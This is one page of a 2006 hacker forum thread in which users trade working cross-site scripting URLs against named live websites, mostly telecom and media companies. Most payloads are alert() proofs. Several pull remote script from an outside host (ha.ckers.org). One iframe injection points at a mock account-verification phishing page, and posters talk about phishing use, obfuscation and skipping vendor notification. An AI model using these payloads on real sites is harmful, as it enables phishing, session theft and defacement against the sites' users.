Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 5 of 65
Re: So it begins
Posted by: maluc
Date: September 23, 2006 03:31PM

http://www.comcast.net/signin.jsp?redirectUrl=%22><script>alert(%22XSS%22)</script><b%20

as you can tell from the url.. i was actually looking for redirects, but xss is always a bonus ^^

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:21PM

https://www.em.avnet.com/sts/home/0%2C11497%2CRID%3D0&CID%3D32209&CCD%3DUSA&SID%3D0&DID%3DDF2&LID%3D0&BID%3DDF2&CTP%3DSTS%2C00.html?ACD=1&UID='%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:27PM

This is a pretty good example of jumping out of encapsulation while in a JavaScript function: http://www.microsoft.com/mac/resources/templates.aspx?pid=templates&browser=1&app=&group=&category=&template=%22;alert(%22XSS%22);//

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:41PM

Is it goon-line or go-online? The world may never know: http://goonline.seeq.com/seeq/int_results.jsp?portal_id=1&domain=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&tag=fdsa&keyword=blah

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 23, 2006 11:50PM

heh, a very phishable find..
and coincidentally, the last javascript string escaping i posted was from their partners in ineptitude http://sla.ckers.org/forum/read.php?3,44,727#msg-727

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:52PM

This is very similar to the Microsoft one: http://www.vh1.com/search/search.jhtml?searchterm=%22;alert(%22XSS%22);//&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 23, 2006 11:55PM

Same vein... I'm on a roll tonight... so I guess this proves that removing < and > isn't the be all end all: http://www.mtv.com/search/index.jhtml?searchterm=%22);alert(%22XSS%22);//&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 24, 2006 12:09AM

http://www.ask.com/webprefs?o=0&l=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 24, 2006 12:13AM

http://search.about.com/fullsearch.htm?terms=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 24, 2006 12:16AM

Hmm... actually looks like all their cnames are vulnerable too... You know this is the exact reason I loathe about.com... it tries to be everything to everyone and therefore spam all the search engines. Now everything is vulnerable: http://math.about.com/od/mathjokes/index.htm?terms=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/SCRIPT%3E

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 09/24/2006 12:17AM by rsnake.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 12:29AM

lol.. you're certainly on a roll .. and yes, about.com seems to try and have half an answer to everything you need =.=''

http://search.comcast.net/?q=%3Cscript+src%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2Fscript%3E&cat=Images&con=net&x=0&y=0

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 12:36AM

http://www22.verizon.com/Search/Results/?SearchText=%27+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29+onmouseover%3D%27alert%28%22XSS%22%29%27+b&x=14&y=10&box=1&QueryText=%27+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29+onmouseover%3D%27alert%28%22XSS%22%29%27+b&Coll1=1&Coll=Enterprise%2C+Federal%2C+Wholesale%2C+Corporate+Information%2C+LearningCorner&Coll2=home_products%2C+home_support%2C+business_products%2C+business_support&site=&ps=1&om=1&cs=1&checkall=&resultspage=firstpage&ResultStart=1&ResultCount=3&statechoice=ALL&cmd=new&kb=&from=1

onmouseover the 'Search for' box.. unless you use firefox

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 12:58AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://business.verizonwireless.com/b2b/jsp/popups/optin.jsp&email=xss'><script>alert('XSS')</script><b%20 business.verizonwireless.com

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 01:02AM

http://search.t-mobile.com/inquiraapp/ui.jsp?ui_mode=question&question_box=Is%20This%20Vulnerable?%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

maybe i should get into the phishing business.. it just seems too easy _-_

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 01:11AM

http://supportcingular.atgnow.com/cng/resultDisplay.do?page=http%3A%2F%2Fha.ckers.org/images/stallowned.jpg&result=9&responseid=bfd397882facb4d9%3A35998f%3A10dde0404b3%3A3c92&groupid=1&contextid=10261%3A849.980&clusterName=CingularCluster&doctype=1000&excerpt=Download+the+fix+from%3A+http%3A%2F%2Fwww.google.com%2Fdownloads%2Fdetails.aspx%3FFamilyID%3D17d997d2-5034-4bbb-b74d-ad8430a1f7c8%26DisplayLang%3Den#Goto849

so this is not really XSS.. but it's amusing. auto-defacer

Edit: it seems you need a sessionid first.. so click twice

-maluc



Edited 1 time(s). Last edit at 09/24/2006 05:56AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 01:32AM

http://www.cingular.com/sbc/other_databases/locator/storeLocator?link=cingnew_map&var20=http%3A%2F%2Fwww.cingular.com&var21=&sqlcol1=INTERNET_FLAG&sqlcnd1=%3D&sqlval1=%27Y%27&streetaddress=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&city=maluc&state=NY&zip=10308&queryRadius=5&submit.x=19&submit.y=2

cingular took longer than the others.. so good job to them

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 04:19AM

again because i was bored.. http://onlinecare.cingular.com/support/knowledgeBase.do?content=%68tt%70%3a%2f/cingular%2ego%2edyndns%2e%6frg/accountverify.html
feel free to login..

This isn't arbitrary XSS, only iframe injection solely from the link: content=http://evil.com .. but it is a good example to show that an injection under /support/ can be quite damaging from phishing - even when just an iframe.

This one is particularly well suited for phishing, since the domain still stays as onlinecare.cingular.com (not so with redirects) .. and the URL is short (long hex encoded strings look suspicious) and the rest of the site is functional and convincing

hopefully, for their sake, they fix it soon - although i'm too lazy to notify them.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 04:26AM

http://www1.sprintpcs.com/learn/form_public_question.jsp?bmForm=sendEmail&bmFormID=1159089875101&bmUID=1159089875101&bmIsForm=true&bmPrevTemplate=learn%2Fform_public_question.jsp&bmText=EMAIL_QUESTION%3C%3EfName&bmRequired=EMAIL_QUESTION%3C%3EfName&EMAIL_QUESTION%3C%3EfName=&bmText=EMAIL_QUESTION%3C%3ElName&bmRequired=EMAIL_QUESTION%3C%3ElName&EMAIL_QUESTION%3C%3ElName=&bmText=EMAIL_QUESTION%3C%3EcontactNo&bmRequired=EMAIL_QUESTION%3C%3EcontactNo&EMAIL_QUESTION%3C%3EcontactNo=&bmText=EMAIL_QUESTION%3C%3EemailUs&bmRequired=EMAIL_QUESTION%3C%3EemailUs&EMAIL_QUESTION%3C%3EemailUs=&bmSingle=EMAIL_QUESTION%3C%3Etopic&EMAIL_QUESTION%3C%3Etopic=&bmText=EMAIL_QUESTION%3C%3Etext_area&EMAIL_QUESTION%3C%3Etext_area=XSS+Goes+Here%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&bmText=charCountMeter&charCountMeter=1147&bmImage=submit.x&bmImage=submit.y&submit.x=33&submit.y=12&bmFields=bmForm%2CbmFormID%2CbmUID%2CbmIsForm%2CbmPrevTemplate%2CbmText%2CbmRequired%2CbmSingle%2CbmImage&bmHash=bfdeb512638bba6615437a7e4aacdbd04e5ae756

no wonder HP can get phone records so easily _-_

Edit: Again, needs token first .. might be a way to use session fixation on some of them.. i'll check on it later

-maluc



Edited 1 time(s). Last edit at 09/24/2006 05:59AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 04:46AM

here's another good example for injecting inside script tags.. http://www.vodafone.com/site_search_results/0,3062,CATEGORY_ID%253D200%2526LANGUAGE_ID%253D0%2526CONTENT_ID%253D0,00.html?section=all&company=all&KWD=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+&submitButton=%C2%BB

the filter correctly encodes special characters to unuseable but displayable forms.. but inside javascript, it escapes double quotations to \" .. which does nothing to prevent you from prematurely ending a string.

However, it also translates } into | .. just to be a pain. and prevents anyone from ending the if(null=null) { blah; | statement. Thus the need for a new set of script tags

\";</script><script>alert('XSS');</script><b

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:10AM

http://www.chinaunicom.com/search/search.jsp?s_con=I%20Have%3Cscript%3Ealert('XSS')%3C/script%3E%20no%20idea%20how%20to%20read%20mandarin no filters

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:22AM

http://buscador.telefonica.es/jsp/index.jsp?QUERYSTRING=&NOMLIB=telefonica%7Ctelefonicacom%7Cgrupo_telefonicaonline%7Cgrupo_Telefonicamoviles%7Cgrupo_telefonicadata%7Cgrupo_telefonicamedia%7Cgrupo_cabitel%7Cgrupo_fundaciontelefonica%7Cgrupo_telefonicaid%7Cgrupo_telefonicacable%7Cgrupo_terra%7C&QUERYTYPE=1&QUERYLEVEL=2&DOFRAME=YES&NRESULT=10&PAG=DORESULT&PAGINA=0&FILEINI=&SALADEPRENSA=&IDIOM=&QUERYTXT=a'><script>alert('XSS');</script><b no filters

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:30AM

http://www.orange.com/francais/search/default.asp?qt=maluc%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&ref=form&nh=100&postback=true&col=frhtml no filters .. big french cell phone company, if you're american and don't know them

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:52AM

http://www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/programView.do?string=a%22></iframe><script>alert(%22XSS%22)</script><b&Submit=&saveResults=true&saveResults=true&logDebug=true&indexName=TELECOM&lang=ENGLISH&encoding=UTF-8&abstractLength=300&hitsPerSet=10&startSet=1&LANG=EN&tabId=0&pageTypeId=9535&channelId=-8661&programId=27833&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&BV_UseBVCookie=Yes it looks like you first need a session id before this'll work .. (i.e. click the link twice)

no filters.. breaking out of iframe

and i'm exhausted now.. so i'll finish the rest of the top 15 phone companys tomorrow ... http://en.wikipedia.org/wiki/List_of_mobile_network_operators

-maluc


btw RSnake: the link compactor is quite sensitive about unencoded quotations like in: http://www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/programView.do?string=a"></iframe><script>alert("XSS")</script><b&Submit=&saveResults=true&saveResults=true&logDebug=true&indexName=TELECOM&lang=ENGLISH&encoding=UTF-8&abstractLength=300&hitsPerSet=10&startSet=1&LANG=EN&tabId=0&pageTypeId=9535&channelId=-8661&programId=27833&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&BV_UseBVCookie=Yes

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 24, 2006 07:45AM

damn guys, it's getting to be quite a xss competion here.

http://www.mapquest.com/maps/map.adp?cat=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fweird%2Fstallowned.js%3E%3C%2Fscript

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.travelodge.com/Travelodge/control/Booking/search_results&destination=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E&Submit=Submit << http://www.travelodge.com

http://www.reference.com/search?q=';%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E

http://www.information.com/search/index.html?cat=1&keyword=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 09/24/2006 08:27AM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 24, 2006 12:42PM

http://www.youtube.com/results?&search_query=&search_sort='%3E%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: tecklord
Date: September 24, 2006 01:28PM

XSS at many popular web sites :)
http://www.securitylab.ru/blog/tecklord/?category=19

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 02:01PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.telenor.com.pk/careers/Jobs.php?&CV_ID=XSS%27%3C&password=a<script>alert(String.fromCharCode(88,83,83))</script>&Submit2=++Sign+In++ telenor.com.pk .. a large norwegian mobile service provider, that i've never heard of .com.pk is their pakistan domain though

They filter most of their site.. but let their SQL errors spit back unfiltered input
There may me an sql injection in a couple places of their site too.. but i fail at sql stuff :/

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 24, 2006 04:42PM

rsnake, could you copy the stallowned.js to ckers.org?
And possible rename it to 1.js or something similar?

Better for obfuscation as well as my poor memory. :P

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 05:24PM

http://www.teliadk.idlesurf.net/cgi-bin/search.pl?lang_intrf=da&query=asdf%27%3Balert%28%27XSS%27%29%3Bt+%3D%27&x=0&y=0&qtype=and

another cell phone service provider .. .dk = their denmark version

http://se.ext.telia.newjobs.com/login.asp?redirect=h%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20 their job search site.. i dont speak swedish, so not sure if this is a general job site or telia only _-_

http://192.89.232.139/jobs/frmAdSearch.asp?JOBCITY=&JOBUNIT=&JOBTYPE=&JOBFUN=&JOBFUN_SUB=&JOBFUNCTION=&FREE_TEXT=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&JOBSORT=AD_EXT_CDATE&TOP_10=0&L=1 their finnish site, i'm not sure why they don't use a domain name..

http://webbguide.telia.se/redirect.jsp?rid=-1&type=FRONTWEB_INFO_FTG&url=http://nabegr32b.cocolog-nifty.com/wonderfulgr32/images/caterham_seven_csr260.jpg yes i know this is a redirect.. but they were related so i included it here..

-maluc



Edited 3 time(s). Last edit at 09/24/2006 05:54PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 06:24PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://home.singtel.com/customer_service/cust_serv_emailus.asp&salutation_=&name_=XSS1%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cb%20&nature_of_feedback_=&contact_number_=XSS2%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cb%20&email_=XSS3%22%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cb%20&commenting_on_=&your_comments_=XSS4</textarea><script>alert(%22XSS4%22)</script> home.singtel.com

singapore cell phone service company .. no filtering - 3 input tags breakout, and 1 textarea breakout

Well my unscientific, and unexhaustive survey found that atleast 12 of the biggest 17 (70%) cell phone service companys have XSS holes ripe for phishing.. sad indeed :T

-maluc



Edited 1 time(s). Last edit at 09/24/2006 06:53PM by maluc.

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 5 of 65


Sorry, only registered users may post in this forum.